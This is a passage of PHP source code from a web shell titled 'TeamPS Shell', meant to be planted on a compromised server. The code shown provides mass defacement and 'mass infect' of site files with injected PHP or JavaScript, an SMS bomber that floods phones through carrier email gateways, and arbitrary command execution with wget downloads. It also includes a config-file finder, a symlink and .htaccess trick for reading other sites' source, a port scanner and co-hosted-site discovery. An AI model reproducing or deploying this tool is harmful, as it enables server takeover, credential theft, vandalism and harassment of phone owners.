749 $failed++;
750 }
751 }
752 }
753 echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
754 }
755}
756if (isset($_GET['massdeface'])) {
757 echo "<center>
758<font color='#14ab00'>
759<form action='' method='post'>
760Directory to start deface from:<br>
761<select name='deface_dir'>
762<option value='root'>Root</option>
763<option value='custom'>Custom</option>
764</select><br>
765Custom Directory: <input class='text' type='text' name='custom_dir' size='40'><br>
766Source of deface:<br>
767<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
768</textarea><br>
769This will not deface this shell.<br>
770<input type='submit' name='do_mass_deface' value='Deface'><br>
771</form>
772</font>
773</center>";
774}
775//Mass file infect
776if (isset($_POST['do_mass_infect'])) {
777 $masscode = " " . $_POST['massinfect_code'] . "\n";
778 $inf_dir = $_POST['infect_dir'];
779 $infcustom_dir = $_POST['cinfect_dir'];
780 $infcustom_dir = rtrim($infcustom_dir, "/");
781 $failed = 0;
782 $success = 0;
783 if (empty($masscode)) {
784 error("You must enter a code to infect files with!");
785 } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
786 error("You must enter a custom directory when using the Custom option!");
787 } else {
788 if ($inf_dir == "root") {
789 $mddir = $rootdir;
790 }
791 if ($inf_dir == "custom") {
792 $mddir = $infcustom_dir;
793 }
794 foreach (files($mddir) as $key => $file) {
795 $file2 = trim($file, ".");
796 $getinf_file = file_get_contents($file2);
797 if ("$file2" == "$dir/$script2") {
798 echo "";
799 } else {
800 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
801 echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
802 $success++;
803 } else {
804 echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
805 $failed++;
806 }
807 }
808 }
809 echo "<font color='#14ab00'><b>$success files successfully infected!<br>Failed to infect $failed files!</b></font><br>";
810 }
811}
812if (isset($_GET['massinfect'])) {
813 $example = "<?php system() ?>";
814 $example = htmlspecialchars($example);
815 $example2 = "<script>alert()</script>";
816 $example2 = htmlspecialchars($example2);
817 echo "<center>
818<font color='#14ab00'>
819<form action='' method='post'>
820Directory to start infect from:<br>
821<select name='infect_dir'>
822<option value='root'>Root</option>
823<option value='custom'>Custom</option>
824</select><br>
825Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
826This is great for infecting mass files with javascript scripts or php scripts<br>
827It will append the code to the top of each file.<br>
828Example:<br>
829$example<br>
830$example2<br>
831Infect code:<br>
832<textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
833</textarea><br>
834This will not infect this shell.<br>
835<input type='submit' name='do_mass_infect' value='Infect'><br>
836</form>
837</font>
838</center>";
839}
840//SMS Bomber stuff
841if (isset($_POST['do_bomb_sms'])) {
842 $phonenum = $_POST['phnumber'];
843 $carrier = $_POST['carrier'];
844 $amount = $_POST['numberof'];
845 $from = $_POST['from'];
846 $headers = "From: $from\r\n";
847 $headers.= 'MIME-Version: 1.0' . "\n";
848 $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
849 $subject = $_POST['subject'];
850 $to = "$phonenum$carrier";
851 $numsent = 0;
852 $sent_fail = 0;
853 $sent_success = 0;
854 $msgcontent = $_POST['message_content'];
855 if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
856 error("All Fields Must Entered!");
857 } else {
858 while ($numsent < $amount) {
859 if (!@mail($to, $subject, $msgcontent, $headers)) {
860 $numsent++;
861 $sent_fail++;
862 } else {
863 $numsent++;
864 $sent_success++;
865 }
866 }
867 echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
868Failed to send $sent_fail messages.<br>";
869 }
870}
871if (isset($_GET['sms'])) {
872 echo "<font color='#14ab00'>
873<table class='noborder'>
874<tr>
875<form action='' method='post'>
876<td>Phone Number With Area Code</td>
877<td><input type='text' name='phnumber' class='text'></td>
878</tr>
879<tr>
880<td>Carrier:</td>
881<td>
882<select name='carrier'>
883<option value='@sms.3rivers.net'>3 River Wireless</option>
884<option value='@paging.acswireless.com'>ACS Wireless</option>
885<option value='@advantagepaging.com'>Advantage Communications</option>
886<option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
887<option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
888<option value='@airtouch.net'>Airtouch Pagers</option>
889<option value='@airtouchpaging.com'>Airtouch Pagers</option>
890<option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
891<option value='@myairmail.com'>Airtouch Pagers</option>
892<option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
893<option value='@message.alltel.com'>Alltel</option>
894<option value='@alphanow.net'>AlphaNow</option>
895<option value='@page.americanmessaging.net'>American Messaging</option>
896<option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
897<option value='@paging.acswireless.com'>Ameritech Paging</option>
898<option value='@pageapi.com'>Ameritech Paging</option>
899<option value='@airtelap.com'>Andhra Pradesh Airtel</option>
900<option value='@text.aql.com'>Aql</option>
901<option value='@archwireless.net'>Arch Pagers (PageNet)</option>
902<option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
903<option value='@mobile.att.net'>AT&T</option>
904<option value='@txt.att.net'>AT&T2</option>
905<option value='@page.att.net'>AT&T Enterprise Paging</option>
906<option value='@mmode.com'>AT&T Free2Go</option>
907<option value='@mobile.att.net'>AT&T PCS</option>
908<option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
909<option value='@sms.beemail.ru'>BeeLine GSM</option>
910<option value='@beepwear.net'>Beepwear</option>
911<option value='@message.bam.com'>Bell Atlantic</option>
912<option value='@bellmobility.ca'>Bell Canada</option>
913<option value='@txt.bellmobility.ca'>Bell Canada2</option>
914<option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
915<option value='@bellsouth.cl'>Bell South</option>
916<option value='@blsdcs.net'>Bell South2</option>
917<option value='@sms.bellsouth.com'>Bell South3</option>
918<option value='@wireless.bellsouth.com'>Bell South4</option>
919<option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
920<option value='@blsdcs.net'>Bell South Mobility</option>
921<option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
922<option value='@blueskyfrog.com'>Blue Sky Frog</option>
923<option value='@sms.bluecell.com'>Bluegrass Cellular</option>
924<option value='@myboostmobile.com'>Boost</option>
925<option value='@bplmobile.com'>BPL Mobile</option>
926<option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
927<option value='@cmcpaging.com'>Carolina Mobile</option>
928<option value='@cwwsms.com'>Carolina West Wireless</option>
929<option value='@cell1.textmsg.com'>Cellular One</option>
930<option value='@cellularone.textmsg.com'>Cellular One2</option>
931<option value='@message.cellone-sf.com'>Cellular One3</option>
932<option value='@mobile.celloneusa.com'>Cellular One4</option>
933<option value='@sbcemail.com'>Cellular One5</option>
934<option value='@phone.cellone.net'>Cellular One (East Coast)</option>
935<option value='@swmsg.com'>Cellular One (South West)</option>
936<option value='@mycellone.com'>Cellular One (West)</option>
937<option value='@paging.cellone-sf.com'>Cellular One PCS</option>
938<option value='@csouth1.com'>Cellular South</option>
939<option value='@cwemail.com'>Centennial Wireless</option>
940<option value='@cvcpaging.com'>Central Vermont</option>
941<option value='@messaging.centurytel.net'>CenturyTel</option>
942<option value='@rpgmail.net'>Chennai RPG Cellular</option>
943<option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
944<option value='@gocbw.com'>Cincinnati Bell</option>
945<option value='@cingularme.com'>Cingular</option>
946<option value='@mms.cingularme.com'>Cingular2</option>
947<option value='@mycingular.com'>Cingular3</option>
948<option value='@page.cingular.com'>Cingular5</option>
949<option value='@txt.att.net'>Cingular (Now AT&T)</option>
950<option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
951<option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
952<option value='@msg.clearnet.com'>Clearnet</option>
953<option value='@comcastpcs.textmsg.com'>Comcast</option>
954<option value='@comcel.com.co'>Comcel</option>
955<option value='@sms.comviq.se'>Comviq</option>
956<option value='@cookmail.com'>Cook Paging</option>
957<option value='@corrwireless.net'>Corr Wireless Communications</option>
958<option value='@sms.mycricket.com'>Cricket</option>
959<option value='@sms.ctimovil.com.ar'>CTI</option>
960<option value='@airtelmail.com'>Delhi Aritel</option>
961<option value='@delhi.hutch.co.in'>Delhi Hutch</option>
962<option value='@page.hit.net'>Digi-Page / Page Kansas</option>
963<option value='@mobile.dobson.net'>Dobson</option>
964<option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
965<option value='@sms.edgewireless.com'>Edge Wireless</option>
966<option value='@sms.emt.ee'>EMT</option>
967<option value='@emtelworld.net'>Emtel (Mauritius)</option>
968<option value='@escotelmobile.com'>Escotel</option>
969<option value='@fido.ca'>Fido</option>
970<option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
971<option value='@sendabeep.net'>Galaxy Corporation</option>
972<option value='@webpager.us'>GCS Paging</option>
973<option value='@msg.gci.net'>General Communications Inc.</option>
974<option value='@t-mobile-sms.de'>German T-Mobile</option>
975<option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
976<option value='@bplmobile.com'>Goa BPLMobil</option>
977<option value='@sms.goldentele.com'>Golden Telecom</option>
978<option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
979<option value='@celforce.com'>Gujarat Celforce</option>
980<option value='@messaging.sprintpcs.com'>Helio</option>
981<option value='@text.houstoncellular.net'>Houston Cellular</option>
982<option value='@ideacellular.net'>Idea Cellular</option>
983<option value='@ivctext.com'>Illinois Valley Cellular</option>
984<option value='@page.infopagesystems.com'>Infopage Systems</option>
985<option value='@inlandlink.com'>Inland Cellular Telephone</option>
986<option value='@msg.iridium.com'>Iridium (satellite)</option>
987<option value='@rek2.com.mx'>Iusacell</option>
988<option value='@jsmtel.com'>JSM Tele-Page</option>
989<option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
990<option value='@mci.com'>MCI Phone</option>
991<option value='@sms.mymeteor.ie'>Meteor</option>
992<option value='@metropcs.sms.us'>Metro PCS</option>
993<option value='@clearlydigital.com'>Midwest Wireless</option>
994<option value='@mobilecomm.net'>Mobilcomm</option>
995<option value='@text.mtsmobility.com'>MTS</option>
996<option value='@sms.netcom.no'>Netcom</option>
997<option value='@messaging.nextel.com'>Nextel</option>
998<option value='@o2.co.uk'>O2</option>
999<option value='@o2imail.co.uk'>O2#2</option>
1000<option value='@mmail.co.uk'>O2 (M-mail)</option>
1001<option value='@orange.net'>Orange</option>
1002<option value='@qwestmp.com'>Qwest</option>
1003<option value='@pcs.rogers.com'>Rogers</option>
1004<option value='@sms.sasktel.com'>Sasktel (Canada)</option>
1005<option value='@mysmart.mymobile.ph'>Smart Telecom</option>
1006<option value='@messaging.sprintpcs.com'>Sprint</option>
1007<option value='@tms.suncom.com'>Sumcom</option>
1008<option value='@tmomail.net'>T-Mobile</option>
1009<option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
1010<option value='@t-d1-sms.de'>T-Mobile Germany</option>
1011<option value='@txt.att.net'>Tracfone</option>
1012<option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
1013<option value='@vtext.com'>Verizon</option>
1014<option value='@vmobl.com'>Virgin Mobile</option>
1015<option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
1016<option value='@vodafone.net'>Vodafone UK</option>
1017</select>
1018</td>
1019</tr>
1020<tr>
1021<td>Amount Of Messages To Send:</td>
1022<td><input type='text' name='numberof' size='10' class='text'></td>
1023</tr>
1024<tr>
1025<td>From:</td>
1026<td><input type='text' name='from' class='text'></td>
1027</tr>
1028<tr>
1029<td>Subject:</td>
1030<td><input type='text' size='85' class='text' name='subject'></td>
1031</tr>
1032</table>
1033Message Content:<br>
1034<textarea rows='20' cols='150' name='message_content' style='color:#000000'>
1035</textarea><br>
1036<input type='submit' name='do_bomb_sms' value='Bomb'><br>
1037</form><br></font><br>";
1038}
1039//Config finder
1040if (isset($_GET['config'])) {
1041 $configs_found = 0;
1042 foreach (files($rootdir) as $key => $cfile) {
1043 $file2 = trim($cfile, ".");
1044 $cex = explode("/", $file2);
1045 $cex2 = end($cex);
1046 if (preg_match('/config/', $cex2)) {
1047 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1048 $configs_found++;
1049 }
1050 }
1051 if ($configs_found == "0") {
1052 error("No configuration files found!");
1053 } else {
1054 echo "<font color='#14ab00'>$configs_found Configuration files found!</font><br><br>";
1055 success("configs_found", $configs_found);
1056 }
1057}
1058//Search
1059if (isset($_GET['search'])) {
1060 echo "<center><font color='#14ab00' size='3'>
1061<form action='' method='post'>
1062Directory to search in:<br>
1063<input type='text' name='search_dir' class='text' size='50' value='$dir'><br>
1064Value to search for:<br>
1065<input type='text' name='search_value' class='text'><br>
1066<input type='submit' name='do_search' value='Search'>
1067</form>
1068</font>
1069</center>";
1070}
1071if (isset($_POST['do_search'])) {
1072 $searchdir = $_POST['search_dir'];
1073 $searchval = $_POST['search_value'];
1074 $matches = 0;
1075 foreach (files($searchdir) as $key => $cfile) {
1076 $file2 = trim($cfile, ".");
1077 $cex = explode("/", $file2);
1078 $cex2 = end($cex);
1079 if (preg_match('/' . $searchval . '/', $cex2)) {
1080 echo "<a class='navbar' href='http://$domain$script?editfile=$file2'>$file2</a><br>";
1081 $matches++;
1082 }
1083 }
1084 if ($matches == 0) {
1085 error("No files that match $searchval");
1086 } else {
1087 echo "<font color='#14ab00' size='3'>$matches files found that match $searchval</font><br>";
1088 success("files_found", $matches);
1089 }
1090}
1091//Unzip
1092if (isset($_GET['unzipfile'])) {
1093 $unzipfile = $_GET['unzipfile'];
1094 $redir = dirname($unzipfile);
1095 unzip($unzipfile, rtrim($redir, '/'));
1096}
1097//Exectue Command
1098if (isset($_POST['do_exe_command'])) {
1099 $ecmd = $_POST['exe_command'];
1100 $exe_cmd = cmd2($ecmd, $dir);
1101 echo "<center><font color='#14ab00'>
1102<form action='' method='post'>
1103<input type='text' class='text' name='exe_command' size='60'>
1104<input type='submit' name='do_exe_command' value='Execute'><br>
1105</form>
1106Result:<br>
1107<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1108$exe_cmd
1109</textarea></font></center><br><br>";
1110}
1111//wget file
1112if (isset($_POST['do_wget_file'])) {
1113 $wget_file = $_POST['wget_file'];
1114 $wecmd = "wget $wget_file";
1115 $wget_ecmd = cmd2($wecmd, $dir);
1116 echo "<center><font color='#14ab00'>
1117Result:<br>
1118<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
1119$wget_ecmd
1120</textarea></font></center><br><br>";
1121}
1122//Domain information
1123//Get domains hosted on server from yougetsignal.com
1124if (isset($_GET['domaininfo'])) {
1125 echo "<font color='#14ab00' size='3'>";
1126 $dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
1127 $num = 0;
1128 $count = sizeof($dns_record);
1129 echo "<br>Name Servers:</b><br>";
1130 while ($num < $count) {
1131 $name_servers = $dns_record[$num];
1132 $name_servers2 = $name_servers['type'];
1133 $name_servers3 = @$name_servers['target'];
1134 $num++;
1135 if ($name_servers2 == "NS") {
1136 echo "$name_servers3<br>";
1137 $nshost = @$name_servers['host'];
1138 }
1139 if ($name_servers2 == "SOA") {
1140 $nsemail = $name_servers['rname'];
1141 }
1142 if ($name_servers2 == "A") {
1143 $nsip = $name_servers['ip'];
1144 }
1145 }
1146 $num = 0;
1147 echo "<br><table class='noborder'>
1148<tr>
1149<td><b>Host:</b></td>
1150<td>$nshost</td>
1151</tr>
1152<tr>
1153<td><b>IP:</b></td>
1154<td>$nsip</td>
1155</tr>
1156<tr>
1157<td><b>Email:</b></td>
1158<td>$nsemail</td>
1159</tr>
1160</table><br>";
1161 $domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
1162 $status = $domains_on_server->status;
1163 $message = $domains_on_server->message;
1164 $domainAr = $domains_on_server->domainArray;
1165 $num_of_site = $domains_on_server->domainCount;
1166 $count = sizeof($domainAr);
1167 if ($status == "Success") {
1168 echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
1169 while ($num < $count) {
1170 $hossites = $domainAr[$num];
1171 $num++;
1172 $hossites3 = $domainAr[$num];
1173 $hossites3 = $hossites3[0];
1174 $hossites = $hossites[0];
1175 $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) . ")";
1176 $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . ")";
1177 echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
1178 $num++;
1179 }
1180 echo "</table><br>";
1181 $num = 0;
1182 } else {
1183 error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
1184 }
1185 echo "</font><br>";
1186}
1187//Encrypt string
1188if (isset($_GET['encrypt'])) {
1189 echo "<form action='' method='post'>
1190<center><font color='#14ab00'>
1191<input type='text' name='en_string' class='text'>
1192<input type='submit' name='do_encrypt' value='Encrypt String'>
1193</form>
1194</font></center>";
1195}
1196if (isset($_POST['do_encrypt'])) {
1197 $vbsalt = gen_salt("30");
1198 $vbsalt2 = gen_salt("3");
1199 $mybbsalt = gen_salt("8");
1200 $ipbsalt = gen_salt("5");
1201 $joomlasalt = gen_salt("32");
1202 $password = $_POST['en_string'];
1203 $md5 = md5($password);
1204 $md52 = md5(md5($password));
1205 $md53 = md5(md5(md5($password)));
1206 $sha1 = sha1($password);
1207 $sha256 = hash('sha256', $password);
1208 $vbalg = md5(md5($password) . $vbsalt);
1209 $vbalg2 = md5(md5($password) . $vbsalt2);
1210 $mybbalg = md5(md5($mybbsalt) . $password);
1211 $ipbalg = md5(md5($ipbsalt) . md5($password));
1212 $joomlaalg = md5($password . $joomlasalt);
1213 $en_result = "Hashes for string: $password\nMD5: $md5\nmd5(md5(pass)): $md52\nmd5(md5(md5(pass))): $md53\nSHA-1: $sha1\nSHA-256: $sha256\nvBulletin 4: $vbalg:$vbsalt\nvBulletin 3: $vbalg2:$vbsalt2\nMyBB: $mybbalg:$mybbsalt\nIPB: $ipbalg:$ipbsalt\nJoomla 1.0.13+: $joomlaalg:$joomlasalt\n";
1214 echo "<center>
1215<textarea rows='20' cols='150' style='color:#000'>
1216$en_result
1217</textarea>
1218</center><br>";
1219}
1220//Symlink Stuff
1221if (isset($_GET['symlink'])) {
1222 echo "<center><font color='#14ab00'>
1223<form action='' method='post'>
1224Directory To Symlink:<br>
1225<input type='text' name='sym_dir' class='text' size='40'>
1226<input type='submit' name='do_sym' value='Create Symlink'>
1227</form><br>";
1228 if (isset($_POST['do_sym'])) {
1229 $symdir = rtrim($_POST['sym_dir'], '/');
1230 $symdir3 = trim($_POST['sym_dir'], '/');
1231 $symdir2 = str_replace("/", "-", $symdir3);
1232 if (!is_dir("$dir/ssym")) {
1233 if (mkdir("$dir/ssym")) {
1234 $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex sssss.htm\nAddType txt .php\nAddHandler txt .php";
1235 if (file_put_contents("$dir/ssym/.htaccess", $htaccess)) {
1236 } else {
1237 error("Failed to make .htaccess file!");
1238 }
1239 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1240 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir/</a></center>";
1241 } else {
1242 error("Failed to make symlink directory");
1243 }
1244 } else {
1245 cmd2("ln -s $symdir/ $symdir2", "$dir/ssym");
1246 echo "<center><a class='navbar' href='./ssym/$symdir2'>$symdir</a></center><br>";
1247 }
1248 }
1249 $opensymdir = opendir("$dir/ssym");
1250 $symdirs = array();
1251 while ($symfile = readdir($opensymdir)) {
1252 if ($symfile != "." && $file != "..") {
1253 if (is_link("$dir/ssym/$symfile")) {
1254 array_push($symdirs, $symfile);
1255 } else {
1256 }
1257 }
1258 }
1259 if (empty($symdirs)) {
1260 error("No symlinks found!");
1261 } else {
1262 echo "<b>Symlink's Found!</b><br><table class='noborder'>
1263<tr>
1264<th>Link</th>
1265<th>Link</th>
1266</tr>";
1267 $numsym = count($symdirs);
1268 $num = 0;
1269 while ($num < $numsym) {
1270 $symmdir = $symdirs[$num];
1271 $num++;
1272 $symmdir2 = $symdirs[$num];
1273 $num++;
1274 $symd = readlink("$dir/ssym/$symmdir");
1275 $symd2 = readlink("$dir/ssym/$symmdir2");
1276 echo "<tr><td><a href='./ssym/$symmdir' class='navbar'>$symd</a></td><td><a href='./ssym/$symmdir2' class='navbar'>$symd2</a></td></tr>";
1277 }
1278 }
1279 echo "</table><br>
1280</font></center>";
1281}
1282//Port scan
1283if (isset($_GET['scan'])) {
1284 echo "<center><font color='#14ab00' size='3'>
1285Port Scan:<br>
1286<form action='' method='post'>
1287Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
1288Start port: <input type='text' name='start_port' class='text' size='6'>
1289End port: <input type='text' name='end_port' class='text' size='7'><br>
1290<input type='submit' name='start_scan' value='Scan'>
1291</form>
1292</font>
1293</center>";
1294}
1295if (isset($_POST['start_scan'])) {
1296 $scanhost = $_POST['scan_host'];
1297 $startport = $_POST['start_port'];
1298 $endport = $_POST['end_port'];
1299 while ($startport <= $endport) {
1300 if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
1301 echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
1302 } else {
1303 echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
1304 }
1305 $startport++;
1306 }
1307}
1308//Don't put anything you don't want to be echo'd
1309//out between the misc system bar and misc file bar
1310//here!
1311//echo out misc file bar.
1312$wr = is_writeable($dir) ? "<font color='green'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
1313echo "<table border='1' width='100%' frame='void'>
1314<tr>
1315<td>
1316<center>
1317Create directory:<br>
1318<form action='' method='post'>
1319<input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
1320<input type='submit' name='do_create_dir' value='Create'><br>
1321$wr
1322</form>
1323</center>
1324</td>
1325<td>
1326<center>
1327Create file:<br>
1328<form action='' method='post'>
1329<input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
1330<input type='submit' name='do_create_file' value='Create'><br>
1331$wr
1332</form>
1333</center>
1334</td>
1335</tr>
1336<tr>
1337<td>
1338<center>
1339Go to directory:<br>
1340<form action='' method='post'>
1341<input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
1342<input type='submit' name='do_go_dir' value='Go'><br>
1343</form>
1344</center>
1345</td>
1346<td>
1347<center>
1348Edit file:<br>
1349<form action='' method='post'>
1350<input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
1351<input type='submit' name='do_go_edit' value='Edit'><br>
1352</form>
1353</center>
1354</td>
1355</tr>
1356<tr>
1357<td>
1358<center>
1359<form action='' method='post' enctype='multipart/form-data'>
1360Upload to location:<br>
1361<input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
1362<input type='submit' value='Upload' name='do_upload_file'><br>
1363$wr
1364</form>
1365</center>
1366</td>
1367<td>
1368<center>
1369<form action='' method='post'>
1370wget file:<br>
1371<input type='text' name='wget_file' class='text' size='50' value='http://'>
1372<input type='submit' name='do_wget_file' value='wget'>
1373</form>
1374</center>
1375</td>
1376</tr>
1377<table border='1' frame='void' width='100%'>
1378<tr>
1379<td>
1380<center>
1381<form action='' method='post'>
1382Execute Command:<br>
1383<input type='text' class='text' name='exe_command' size='60'>
1384<input type='submit' name='do_exe_command' value='Execute'><br>
1385</form>
1386</center>
1387</td>
1388</tr>
1389</table>
1390<br><br><br>";
1391//echo out files
1392echo "<table border='1' width='100%' frame='void'>
1393<tr>
1394<th>
1395Current Directory: ";
1396$ex = explode("/", $dir);
1397for ($p = 0;$p < count($ex);$p++) {
1398 @$linkpath.= $ex[$p] . '/';
1399 $linkpath2 = rtrim($linkpath, "/");
1400 echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
1401}
1402echo "</th>
1403</tr>
1404</table>
1405<div id='hover'>
1406<table border='1' width='100%'>
1407<form action='' method='post' id='checkboxall'>
1408<tr>
1409<th>Directory/File Name</th>
1410<th>Owner/Group</th>
1411<th>Permissions</th>
1412<th>Writeable</th>
1413<th>Size</th>
1414<th>Last Modified</th>
1415<th>Delete</th>
1416<th>Rename</th>
1417<th>Mass</th>
1418</tr>
1419";
1420foreach ($direcs as $d) {
1421 $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
1422 $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
1423 if (is_array($downer)) {
1424 $downer = $downer['name'];
1425 }
1426 if (is_array($dgroup)) {
1427 $dgroup = $dgroup['name'];
1428 }
1429 $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
1430 $dwrite = is_writeable("$dir/$d") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1431 $dsize = "Directory";
1432 $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
1433 echo "<tr>
1434<td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
1435<td style='text-align: center;'>$downer/$dgroup</td>
1436<td style='text-align: center;'>$dperms</td>
1437<td style='text-align: center;'>$dwrite</td>
1438<td style='text-align: center;'>$dsize</td>
1439<td style='text-align: center;'>$dtime</td>
1440<td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
1441<td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
1442<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
1443</tr>";
1444}
1445foreach ($files as $f) {
1446 $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
1447 $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
1448 if (is_array($fowner)) {
1449 $fowner = $fowner['name'];
1450 }
1451 if (is_array($fgroup)) {
1452 $fgroup = $fgroup['name'];
1453 }
1454 $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
1455 $fwrite = is_writeable("$dir/$f") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
1456 $fsize = ByteConversion(filesize("$dir/$f"));
1457 $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
1458 $zip_file = explode(".", $f);
1459 $zip_file2 = end($zip_file);
1460 echo "<tr>";
1461 if ($zip_file2 == "zip") {
1462 echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
1463 } else {
1464 echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
1465 }
1466 echo "<td style='text-align: center;'>$fowner/$fgroup</td>
1467<td style='text-align: center;'>$fperms</td>
1468<td style='text-align: center;'>$fwrite</td>
1469<td style='text-align: center;'>$fsize</td>
1470<td style='text-align: center;'>$ftime</td>
1471<td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
1472<td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
1473<td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
1474</tr>";
1475}
1476echo "</table></div>";
1477echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
1478<input type='button' onclick='checkall();' value='Select/Unselect All'>
1479<select name='mass_action'>
1480<option value='Delete'>Delete</option>
1481<option value='chmod'>chmod</option>
1482</select>
1483<input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
1484<input type='submit' name='mass_files'><br></div>";
1485echo "</form>";
1486closedir();
1487?>
1488<title>TeamPS Shell</title>
1489<!-- CSS Start !-->
1490<style type="text/css">
1491 a:link {color: #FFFFFF; text-decoration: none; }
1492 a:active {color: #FFFFFF; text-decoration: none; }
1493 a:visited {color: #FFFFFF; text-decoration: none; }
1494 a:hover {color: #000000; text-decoration: none; }
1495 a.navbar:link {color: #FFFFFF; text-decoration: none; }
1496 a.navbar:visited {color: #FFFFFF; text-decoration: none; }
1497 a.navbar:active {color: #FFFFFF; text-decoration: none; }
1498 a.navbar:hover {color: #303030; text-decoration: none; }
1499 body {
1500 background: #121212 url(http://www.p0wersurge.com/forums/images/pscustom/new/ps5skin-min.png) center top repeat-x;
1501 font-family: consolas;
1502 font-weight: bold;
1503 font-size: 12px;
1504 color:#000000;
1505 }
1506 table
1507 {
1508 border-width: 2px;
1509 border-spacing: 2px;
1510 border-style: solid;
1511 border-color: #14ab00;
1512 background-color: #303030;
1513 }
1514 #hover tr:hover{
1515 background-color: #14ab00;
1516 }
1517 .noborder, .noborder tr, .noborder th, .noborder td { border: none; background-color: transparent; color: #14ab00;}
1518 table.th {
1519 padding: 1px;
1520 border-color: #303030;
1521 background-color: #303030;
1522 }
1523 table.td {
1524 padding: 1px;
1525 border-color: #303030;
1526 background-color: #303030;
1527 }
1528 textarea {
1529 border: 3px solid #14ab00;
1530 padding: 3px;
1531 background-color: #303030;
1532 outline-color:#14ab00;
1533 resize: none;
1534 }
1535 .text {
1536 border: 2px solid #14ab00;
1537 padding: 3px;
1538 background-color: #303030;
1539 outline-color:#14ab00;
1540 }
